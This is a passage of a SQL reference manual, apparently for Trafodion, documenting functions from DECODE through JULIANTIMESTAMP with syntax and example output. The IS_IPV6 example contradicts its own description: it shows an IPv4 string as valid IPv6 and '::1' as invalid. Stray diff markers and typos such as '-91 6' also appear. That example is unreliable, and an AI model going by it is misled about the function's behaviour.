perform well.\r\n\r\nThe syntax\r\n\r\n```\r\nDECODE (expr, test_expr, retval [, test_expr2, retval2 ... ] [, default ] ):\r\n```\r\n\r\nis logically equivalent to the following:\r\n\r\n```\r\nCASE\r\n WHEN (expr IS NULL AND test-expr IS NULL) OR expr = test-expr THEN retval\r\n WHEN (expr IS NULL AND test-expr2 IS NULL) OR expr = test_expr2 THEN retval2\r\n ...\r\n ELSE default \/* or ELSE NULL if _default_ not specified *\/\r\nEND\r\n```\r\n\r\nNo special conversion of _expr_, _test-exprN_, or _retvalN_ exist\r\nother than what a CASE statement normally does.\r\n\r\n[[examples_of_decode]]\r\n<<<\r\n=== Examples of DECODE\r\n\r\n* Example of the DECODE function:\r\n+\r\n```\r\nSELECT\r\n emp_name\r\n, DECODE( CAST (( yrs_of_service + 3) \/ 4 AS INT )\r\n , 0,0.04\r\n , 1,0.04\r\n , 0.06\r\n ) as perc_value\r\nFROM employees;\r\n\r\nSELECT\r\n supplier_name\r\n, DECODE( supplier_id\r\n , 10000\r\n , 'Company A'\r\n , 10001\r\n , 'Company B'\r\n , 10002\r\n , 'Company C'\r\n , 'Company D'\r\n ) as result\r\nFROM suppliers;\r\n```\r\n\r\n* This example shows a different way of handling NULL specified as\r\ndefault and not specified as default explicitly:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi', ?p3, null ) from emp;\r\n..\r\n*** ERROR[4049] A CASE expression cannot have a result data type of both CHAR(2) and NUMERIC(18,6).\r\n*** ERROR[4062] The preceding error actually occurred in function DECODE((?P1 || ?P2),(' ' TRIM ?P1), 'Hi', ?P3, NULL)\r\n*** ERROR[8822] The statement was not prepared.\r\n```\r\n+\r\nThe last _ret-val_ is an explicit NULL. When {project-name} SQL encounters\r\nthis situation, it assumes that the return value will be NUMERIC(18,6).\r\nOnce {project-name} SQL determines that the return values are numeric, it\r\ndetermines that all possible return values must be numeric. When 'Hi' is\r\nencountered in a _ret-val_ position, the error is produced because the\r\nCHAR(2) type argument is not comparable with a NUMERIC(18,6) type return\r\nvalue.\r\n+\r\nThis statement is equivalent and will not produce an error:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi' ) from emp;\r\n```\r\n\r\n<<<\r\n[[degrees_function]]\r\n== DEGREES Function\r\n\r\nThe DEGREES function converts a numeric value expression expressed in\r\nradians to the number of degrees.\r\n\r\nDEGREES is a {project-name} SQL extension.\r\n\r\n```\r\nDEGREES (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the DEGREES function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_degrees]]\r\n=== Examples of Degrees\r\n\r\n* This function returns the value 45.0001059971939008 in degrees:\r\n+\r\n```\r\nDEGREES(0.78540)\r\n```\r\n\r\n* This function returns the value of 45. The function degrees is the\r\ninverse of the function radians.\r\n+\r\n```\r\nDEGREES(RADIANS(45))\r\n```\r\n\r\n<<<\r\n[[diff1_function]]\r\n== DIFF1 Function\r\n\r\nThe DIFF1 function is a sequence function that calculates the amount of\r\nchange in an expression from row to row in an intermediate result table\r\nordered by a sequence by clause in a select statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>. \r\n\r\nDIFF1 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF1 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF1 returns\r\nthe difference between the value of the column in the current row and\r\nits value in the previous row; this version calculates the unit change\r\nin the value from row to row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF1 returns the\r\ndifference in consecutive values in _column-expression-a_ divided by\r\nthe difference in consecutive values in _column-expression-b_.\r\n\r\nThe purpose of the second argument is to distribute the amount of change\r\nfrom row to row evenly over some unit of change (usually time) in\r\nanother column.\r\n\r\n[[considerations_for_diff1]]\r\n=== Considerations for DIFF1\r\n\r\n[[equivalent-result]]\r\n==== Equivalent Result\r\n\r\nIf you specify one argument, the result of DIFF1 is equivalent to:\r\ncolumn-expression-a - OFFSET(column-expression-a, 1) If you specify two\r\narguments, the result of DIFF1 is equivalent to:\r\n\r\n```\r\nDIFF1(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n[[datetime-arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF1\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff1]]\r\n=== Examples of DIFF1\r\n\r\n* Retrieve the difference between the I1 column in the current row and\r\nthe I1 column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (I1) AS DIFF1_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1\r\n------------\r\n ?\r\n 21959\r\n -9116\r\n -14461\r\n 7369\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first row retrieved displays null because the offset from the\r\ncurrent row does not fall within the results set.\r\n\r\n* Retrieve the difference between the TS column in the current row and\r\nthe TS column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (TS) AS DIFF1_TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_TS\r\n--------------------\r\n ?\r\n 30002620.000000\r\n 134157861.000000\r\n 168588029.000000\r\n 114055223.000000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are expressed as the number of seconds. For example, the\r\ndifference between TIMESTAMP '1951-02-15 14:35:49' and TIMESTAMP\r\n'1950-03-05 08:32:09' is approximately 347 days. The difference between\r\nTIMESTAMP '1955-05-18 08:40:10' and TIMESTAMP '1951-02-15 14:35:49' is\r\napproximately 4 years and 3 months, and so on.\r\n\r\n<<<\r\n* This query retrieves the difference in consecutive values in I1\r\ndivided by the difference in consecutive values in TS:\r\n+\r\n```\r\nSELECT DIFF1 (I1,TS) AS DIFF1_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1TS\r\n-------------------\r\n ?\r\n .0007319\r\n -.0000679\r\n -.0000857\r\n .0000646\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equivalent to the quotient of the results from the two\r\npreceding examples. For example, in the second row of the output of this\r\nexample, 0.0007319 is equal to 21959 divided by 30002620.\r\n\r\n\r\n<<<\r\n[[diff2_function]]\r\n== DIFF2 Function\r\n\r\nThe DIFF2 function is a sequence function that calculates the amount of\r\nchange in a DIFF1 value from row to row in an intermediate result table\r\nordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nDIFF2 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF2 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF2 returns\r\nthe difference between the value of DIFF1(_column-expression-a_) in\r\nthe current row and the same result in the previous row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF2 returns the\r\ndifference in consecutive values of DIFF1(_column-expression-a_)\r\ndivided by the difference in consecutive values in\r\n_column-expression-b_.\r\nSee <<diff1_function,DIFF1 Function>>.\r\n\r\n[[considerations_for_diff2]]\r\n=== Considerations for DIFF2\r\n\r\n[[equivalent_result_1]]\r\n==== Equivalent Result\r\n\r\n* If you specify one argument, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF1(column-expression-a)- OFFSET(DIFF1(column-expression-a),1)\r\n```\r\n\r\n* If you specify two arguments, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF2(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n\r\n[[datetime_arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF2\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff2]]\r\n=== Examples of DIFF2\r\n\r\n* Retrieve the difference between the value of DIFF1(I1) in the current\r\nrow and the same result in the previous row:\r\n+\r\n```\r\nSELECT DIFF2 (I1) AS DIFF2_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1\r\n--------------------\r\n ?\r\n ?\r\n -31075\r\n -5345\r\n 21830\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equal to the difference of DIFF1(I1) for the current row\r\nand DIFF1(I1) of the previous row. For example, in the third row of the\r\noutput of this example, -31075 is equal to\r\n-91 6 minus 21959. The value -91 6 is the result of DIFF1(I1) for the\r\ncurrent row, and the\r\nvalue 21959 is the result of DIFF1(I1) for the previous row.\r\nSee <<examples_of_diff1,Examples of DIFF1>>.\r\n\r\n* Retrieve the difference in consecutive values of DIFF1(I1) divided by\r\nthe difference in consecutive values of TS:\r\n+\r\n```\r\nSELECT DIFF2 (I1,TS) AS DIFF2_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1TS\r\n---------------------\r\n ?\r\n ?\r\n -.000231\r\n -.000031\r\n .000191\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[exp_function]]\r\n== EXP Function\r\n\r\nThis function returns the exponential value (to the base e) of a numeric\r\nvalue expression. EXP is a {project-name} SQL extension.\r\n\r\n```\r\nEXP (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the EXP function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\nThe minimum input value must be between -744.4400719 and -744.4400720.\r\n\r\nThe maximum input value must be between 709.78271289338404 and\r\n709.78271289338405.\r\n\r\n[[examples_of_exp]]\r\n=== Examples of EXP\r\n\r\n* This function returns the value 3.49034295746184128E+000, or\r\napproximately 3.4903:\r\n+\r\n```\r\nEXP (1.25)\r\n```\r\n\r\n* This function returns the value 2.0. The function EXP is the inverse\r\nof the function LOG:\r\n+\r\n```\r\nEXP (LOG(2.0))\r\n```\r\n\r\n<<<\r\n[[explain_function]]\r\n== EXPLAIN Function\r\n\r\nThe EXPLAIN function is a table-valued stored function that generates a\r\nresult table describing an access plan for a SELECT, INSERT, DELETE, or\r\nUPDATE statement.\r\nSee <<result_of_the_explain_function,Result of the EXPLAIN Function>>.\r\n\r\nThe EXPLAIN function can be specified as a table reference (_table_)\r\nin the FROM clause of a SELECT statement if it is preceded by the\r\nkeyword TABLE and surrounded by parentheses.\r\n\r\nFor information on the EXPLAIN statement,\r\nsee <<explain_statement,EXPLAIN Statement>>.\r\n\r\n```\r\nEXPLAIN (module,'statement-pattern')\r\n```\r\n\r\n* `_module_ is:`\r\n+\r\n```\r\n'module-name' | NULL\r\n```\r\n\r\n* `'_module-name_'`\r\n+\r\nReserved for future use.\r\n\r\nThe module name is enclosed in single quotes and is case-sensitive. If a\r\nmodule name is uppercase, the value you specify within single quotes\r\nmust be uppercase. For example: 'MYCAT.MYSCH.MYPROG'\r\n\r\n* `NULL`\r\n+\r\nexplains statements prepared in the session. '_statement-pattern_'\r\n+\r\nA statement pattern is enclosed in single quotes and is case-sensitive.\r\nThe statement name must be in uppercase, unless you delimit the statement\r\nname in a PREPARE statement.\r\n\r\n[[considerations_for_explain_function]]\r\n=== Considerations for EXPLAIN Function\r\n\r\n\r\n[[using_a_statement_pattern]]\r\n==== Using a Statement Pattern\r\n\r\nUsing a statement pattern is analogous to using a LIKE pattern. You can\r\nuse the LIKE pattern in the following ways:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL,'S%'));\r\nSELECT * FROM table (EXPLAIN(NULL,'S1'));\r\nSELECT * FROM table (EXPLAIN(NULL,'%1'));\r\n```\r\n\r\nHowever, you cannot use the LIKE pattern in this way:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL, '%'))\r\n```\r\n\r\nThis statement returns the EXPLAIN result for all prepared statements\r\nwhose names begin with the uppercase letter 'S':\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL,'S%'))\r\n```\r\n\r\nIf the statement pattern does not find any matching statement names, no\r\nrows are returned as the result of the SELECT statement.\r\n\r\n\r\n[[obtaining_an_explain_plan_while_queries_are_running]]\r\n==== Obtaining an EXPLAIN Plan While Queries Are Running\r\n\r\n{project-name} SQL provides the ability to capture an EXPLAIN plan for a\r\nquery at any time while the query is running with the QID option. By\r\ndefault, this behavior is disabled for a {project-name} session.\r\n\r\nNOTE: Enable this feature before you start preparing and executing\r\nqueries.\r\n\r\nAfter this feature is enabled, use the following syntax in an EXPLAIN\r\nfunction to get the query execution plan of a running query:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL, 'QID=_qid_'))\r\n```\r\n\r\n* `_qid_` is a case-sensitive identifier, which represents the query ID. For\r\nexample:\r\n+\r\n```\r\n'QID=MXID01001011194212103659400053369000000085905admin00_2605_S1'\r\n```\r\n\r\nThe EXPLAIN function or statement returns the plan that was generated\r\nwhen the query was prepared. EXPLAIN for QID retrieves all the\r\ninformation from the original plan of the executing query. The plan is\r\navailable until the query finishes executing and is removed or\r\ndeallocated.\r\n\r\n<<<\r\n[[result_of_the_explain_function]]\r\n==== Result of the EXPLAIN Function\r\n\r\nThe result table of the EXPLAIN function describes the access plans for\r\nSELECT, INSERT, DELETE, or UPDATE statements.\r\n\r\nIn this description of the result of the EXPLAIN function, an operator\r\ntree is a structure that represents operators used in an access plan as\r\nnodes, with at most one parent node for each node in the tree, and with\r\nonly one root node.\r\n\r\nA node of an operator tree is a point in the tree that represents an\r\nevent (involving an operator) in a plan. Each node might have\r\nsubordinate nodes — that is, each event might generate a subordinate event\r\nor events in the plan.\r\n\r\n[cols=\"30%l,30%l,40%\",options=\"header\"]\r\n|===\r\n| Column Name | Data Type | Description\r\n| MODULE_NAME | CHAR(60) | Reserved for future use.\r\n| STATEMENT_ NAME | CHAR(60) | Statement name; truncated on the right if longer than 60 characters.\r\n| PLAN_ID | LARGEINT | Unique system-generated plan ID automatically assigned by {project-name} SQL;\r\ngenerated at compile time.\r\n| SEQ_NUM | INT | Sequence number of the current operator in the operator tree; indicates\r\nthe sequence in which the operator tree is generated.\r\n| OPERATOR | CHAR(30) | Current operator type.\r\n| LEFT_CHILD_ SEQ_NUM | INT | Sequence number for the first child operator of the current operator;\r\nnull if node has no child operators.\r\n| RIGHT_CHILD_ SEQ_NUM | INT | Sequence number for the second child operator of the current operator;\r\nnull if node does not have a second child.\r\n| TNAME | CHAR(60) | For operators in scan group, full name of base table, truncated on the\r\nright if too long for column. If correlation name differs from table\r\nname, simple correlation name first and then table name in parentheses.\r\n| CARDINALITY | REAL | Estimated number of rows that will be returned by the current operator.\r\nCardinality appears as ROWS\/REQUEST in some forms of EXPLAIN output. For\r\nthe right child of a nested join, multiply the cardinality by the number\r\nof requests to get the total number of rows produced by this operator.\r\n| OPERATOR_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator.\r\n| TOTAL_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator, including the cost of all subtrees in the operator tree.\r\n| DETAIL_COST | VARCHAR (200) | Cost vector of five items, described in the next table.\r\n| DESCRIPTION | VARCHAR (3000) | Additional information about the operator.\r\n|===\r\n\r\nThe DETAIL_COST column of the EXPLAIN function results contains these\r\ncost factors:\r\n\r\n[cols=\"20%l,80%\"]\r\n|===\r\n| CPU_TIME | An estimate of the number of seconds of processor time it might take to\r\nexecute the instructions for this operator. A value of 1.0 is 1 second.\r\n| IO_TIME | An estimate of the number of seconds of I\/O time (seeks plus data\r\ntransfer) to perform the I\/O for this operator.\r\n| MSG_TIME | An estimate of the number of seconds it takes for the messaging for this\r\noperator. The estimate includes the time for the number of local and\r\nremote messages and the amount of data sent.\r\n| IDLETIME | An estimate of the number of seconds to wait for an event to happen. The\r\nestimate includes the amount of time to open a table or start an ESP\r\nprocess.\r\n| PROBES | The number of times the operator will be executed. Usually, this value\r\nis 1, but it can be greater when you have, for example, an inner scan of\r\na nested-loop join.\r\n|===\r\n\r\n[[examples_of_explain_function]]\r\n=== Examples of EXPLAIN Function\r\n\r\n* Display the specified columns in the result table of the EXPLAIN\r\nfunction for the prepared statement REGION:\r\n+\r\n```\r\n>>SELECT seq_num, operator, operator_cost FROM table (EXPLAIN (null, 'REG'));\r\n\r\nSEQ_NUM OPERATOR OPERATOR_COST\r\n----------- ------------------------------ ---------------\r\n 1 TRAFODION_SCAN 0.43691027\r\n 2 ROOT 0.0\r\n\r\n--- 2 row(s) selected.\r\n\r\n>>log;\r\n```\r\n+\r\nThe example displays only part of the result table of the EXPLAIN\r\nfunction. It first uses the EXPLAIN function to generate the table and\r\nthen selects the desired columns.\r\n\r\n<<<\r\n[[extract_function]]\r\n== EXTRACT Function\r\n\r\nThe EXTRACT function extracts a datetime field from a datetime or\r\ninterval value expression. It returns an exact numeric value.\r\n\r\n```\r\nEXTRACT (datetime-field FROM extract-source)\r\n```\r\n\r\n* `_datetime-field_` is:\r\n+\r\nYEAR \\| MONTH \\| DAY \\| HOUR \\| MINUTE \\| SECOND\r\n\r\n* `_extract-source_` is:\r\n+\r\ndatetime-expression \\| interval-expression\r\n\r\nSee <<datetime_value_expressions,Datetime Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[examples_of_extract]]\r\n=== Examples of EXTRACT\r\n\r\n* Extract the year from a DATE value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM DATE '2007-09-28')\r\n```\r\n+\r\nThe result is 2007.\r\n\r\n* Extract the year from an INTERVAL value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM INTERVAL '01-09' YEAR TO MONTH)\r\n```\r\n+\r\nThe result is 1.\r\n\r\n\r\n<<<\r\n[[hour_function]]\r\n=== HOUR Function\r\n\r\nThe HOUR function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n\r\nHOUR is a {project-name} SQL extension.\r\n\r\n```\r\nHOUR (datetime-expression)\r\n```\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_hour]]\r\n=== Examples of HOUR\r\n\r\n* Return an integer that represents the hour of the day from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, HOUR(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2007-04-10 2007-04-21 08:15:00.000000 8\r\n```\r\n\r\n<<<\r\n[[group_concat_function]]\r\n== GROUP_CONCAT Function\r\n\r\nThis function returns a string result with the concatenated non-NULL values from a group. \r\nIt returns NULL if there are no non-NULL values. \r\nThe syntax is as follows:\r\n\r\n```\r\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\r\n [ORDER BY {unsigned_integer | col_name | expr}\r\n [ASC | DESC] [,col_name ...]]\r\n [SEPARATOR str_val])\r\n```\r\n\r\nGet the concatenated values of expression combinations. To eliminate duplicate values, \r\nuse the DISTINCT clause. \r\nTo sort values in the result, use the ORDER BY clause. To sort in reverse order, add \r\nthe DESC (descending) keyword to the name of the column you are sorting by in the \r\nORDER BY clause. The default is ascending order; this may be specified explicitly using\r\nthe ASC keyword. The default separator between values in a group is comma (,). To specify \r\na separator explicitly, use SEPARATOR followed by the string literal value that should be \r\ninserted between group values. To eliminate the separator altogether, specify SEPARATOR ''.\r\n\r\n[[examples_of_group_concat]]\r\n=== Examples of GROUP_CONCAT\r\n\r\nThe following example returns concatenated strings for column test_score for each student.\r\n\r\n```\r\n>> SELECT student_name,\r\n GROUP_CONCAT(DISTINCT test_score\r\n ORDER BY test_score DESC SEPARATOR ' ')\r\n FROM student\r\n GROUP BY student_name;\r\nSTUDENT_NAME (EXPR)\r\n-------------- --------------\r\nscott 80 90 91 56\r\ntom 77 43 91\r\n```\r\n\r\n<<<\r\n[[insert_function]]\r\n== INSERT Function\r\n\r\nThe INSERT function returns a character string where a specified number\r\nof characters within the character string has been deleted, beginning at\r\na specified start position, and where another character string has been\r\ninserted at the start position. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nINSERT is a {project-name} SQL extension.\r\n\r\n```\r\nINSERT (char-expr-1, start, length, char-expr-2)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. The character string _char-expr-2_ is\r\ninserted into the character string_char-expr-1_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start_`\r\n+\r\nspecifies the starting position start within char-expr-1 at which to\r\nstart deleting length number of characters. after the deletion, the\r\ncharacter string char-expr-2 is inserted into the character string\r\n char-expr-1 , beginning at the start position specified by the number\r\n start . The number start must be a value greater than zero of exact\r\nnumeric data type and with a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to delete from _char-expr-1_. The\r\nnumber _length_ must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. _length_ must be less than\r\nor equal to the length of _char-expr-1_.\r\n\r\n[[examples_of_insert]]\r\n=== Examples of INSERT\r\n\r\n* Suppose that your JOB table includes an entry for a sales\r\nrepresentative. Use the INSERT function to change SALESREP to SALES REP:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = INSERT (jobdesc, 6, 3, ' REP')\r\nWHERE jobdesc = 'SALESREP';\r\n```\r\n+\r\nNow check the row you updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job WHERE jobdesc = 'SALES REP';\r\n\r\nJob Description\r\n------------------\r\nSALES REP\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[is_ipv4_function]]\r\n== IS_IPV4 Function\r\n\r\nFor a given argument, if it is a valid IPV4 string, IS_IPV4() returns 1 else returns 0. \r\n```\r\nIS_IPV4( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV4 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv4]]\r\n=== Examples of IS_IPV4\r\n\r\nThis function returns 1 for the first input argument, since it is a valid IPV4 string; \r\n0 for the second input argument, since it is an invalid IPV4 string.\r\n\r\n```\r\n>>SELECT IS_IPV4('10.0.5.9'), IS_IPV4('10.0.5.256') from dual;\r\n\r\n(EXPR) (EXPR)\r\n------- -------\r\n1 0\r\n```\r\n<<<\r\n[[is_ipv6_function]]\r\n== IS_IPV6 Function\r\n\r\nReturns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise. \r\nThis function does not consider IPv4 addresses to be valid IPv6 addresses.\r\n\r\n```\r\nIS_IPV6( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV6 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv6]]\r\n=== Examples of IS_IPV6\r\n\r\nThis function returns 0 for the second input argument, since it is a valid IPV6 string; \r\n1 for the second input argument, since it is an invalid IPVr6 string.\r\n\r\n```\r\n>>SELECT IS_IPV6('10.0.5.9'), IS_IPV6('::1') from dual;\r\n(EXPR) (EXPR)\r\n-------- -------\r\n1 0\r\n```\r\n<<<\r\n +[[inet_aton_function]]\r\n +== INET_ATON Function\r\n +\r\n +Given the dotted-quad representation of an IPv4 network address as a string, \r\n +returns an integer that represents the numeric value of the address in network \r\n +byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n +\r\n +```\r\n +INET_ATON( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the IP address. The _expression_ cannot contain an aggregate\r\n +function or a subquery. If the input value is NULL, INET_ATON returns NULL.\r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_aton]]\r\n +=== Examples of INET_ATON\r\n +\r\n +\r\n +```\r\n +>>SELECT INET_ATON('10.0.5.9') from dual;\r\n +\r\n +(EXPR)\r\n +-----------\r\n +167773449 \r\n +```\r\n +<<<\r\n +[[inet_ntoa_function]]\r\n +== INET_NTOA Function\r\n +\r\n +Given a numeric IPv4 network address in network byte order, returns the \r\n +dotted-quad string representation of the address as a nonbinary string in \r\n +the connection character set. INET_NTOA() returns NULL if it does \r\n +not understand its argument.\r\n +\r\n +```\r\n +INET_NTOA( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the number to IP address. The _expression_ cannot contain \r\n +an aggregate function or a subquery. If the input value is NULL, INET_NTOA \r\n +returns NULL. \r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_ntoa]]\r\n +=== Examples of INET_NTOA\r\n +\r\n +this function will convert an integer into the dotted-quad string \r\n +representation of the IP address.\r\n +\r\n +```\r\n +>>SELECT INET_NTOA(167773449) from dual\r\n +\r\n +(EXPR)\r\n +-------------\r\n +'10.0.5.9'\r\n +```\r\n +<<<\r\n[[isnull_function]]\r\n== ISNULL Function\r\n\r\nThe ISNULL function returns the value of the first argument if it is not\r\nnull, otherwise it returns the value of the second argument. Both\r\nexpressions must be of comparable types.\r\n\r\nISNULL is a {project-name} SQL extension.\r\n\r\n```\r\nISNULL(ck-expr, repl-value)\r\n```\r\n\r\n* `_ck-expr_`\r\n+\r\nan expression of any valid SQL data type.\r\n\r\n* `_repl-value_`\r\n+\r\nan expression of any valid SQL data type, but must be a comparable type\r\nwith that of _ck-expr_.\r\n\r\n[[examples_of_isnull]]\r\n=== Examples of ISNULL\r\n\r\n* This function returns a 0 instead of a null if value is null.\r\n+\r\n```\r\nISNULL(value,0)\r\n```\r\n\r\n* This function returns the date constant if date_col is null.\r\n+\r\n```\r\nISNULL(date_col, DATE '2006-01-01')\r\n```\r\n\r\n* This function returns 'Smith' if the string column last_name is null.\r\n+\r\n```\r\nISNULL(last_name, 'Smith')\r\n```\r\n\r\n<<<\r\n[[juliantimestamp_function]]\r\n== JULIANTIMESTAMP Function\r\n\r\nThe JULIANTIMESTAMP function converts a datetime value into a 64-bit\r\nJulian timestamp value that represents the number of microseconds that\r\nhave elapsed between 4713 B.C., January 1, 00:00, and the specified\r\ndatetime value. JULIANTIMESTAMP returns a value of data type LARGEINT.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nJULIANTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nJULIANTIMESTAMP(datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a value of type DATE, TIME, or\r\nTIMESTAMP. If _datetime-expression_ does not contain all the fields from YEAR through\r\nSECOND, {project-name} SQL extends the value before converting it to a Julian\r\ntimestamp. Datetime fields to the left of the specified datetime value\r\nare set to current date fields. Datetime fields to the right of the\r\nspecified datetime value are set to zero. See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_juliantimestamp]]\r\n=== Considerations for JULIANTIMESTAMP\r\n\r\nThe _datetime-expression_ value must be a date or timestamp value from\r\nthe beginning of year 0001 to the end of year 9999.\r\n\r\n[[examples_of_juliantimestamp]]\r\n=== Examples of JULIANTIMESTAMP\r\n\r\nThe project table consists of five columns using the data types NUMERIC,\r\nVARCHAR, DATE, TIMESTAMP, and INTERVAL.\r\n\r\n* Convert the TIMESTAMP value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT ship_timestamp, JULIANTIMESTAMP (ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSHIP_TIMESTAMP (EXPR)\r\n-------------------------- --------------------\r\n2008-04-21 08:15:00.000000 212075525700000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Convert the DATE value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT start_date, JULIANTIMESTAMP (start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSTART_DATE (EXPR)\r\n---------- --------------------\r\n2008-04-10 212074545600000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lastnotnull_function]]\r\n== LASTNOTNULL Function\r\n\r\nThe LASTNOTNULL function is a sequence function that returns the last\r\nnon-null value of a column in an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nLASTNOTNULL is a {project-name} SQL 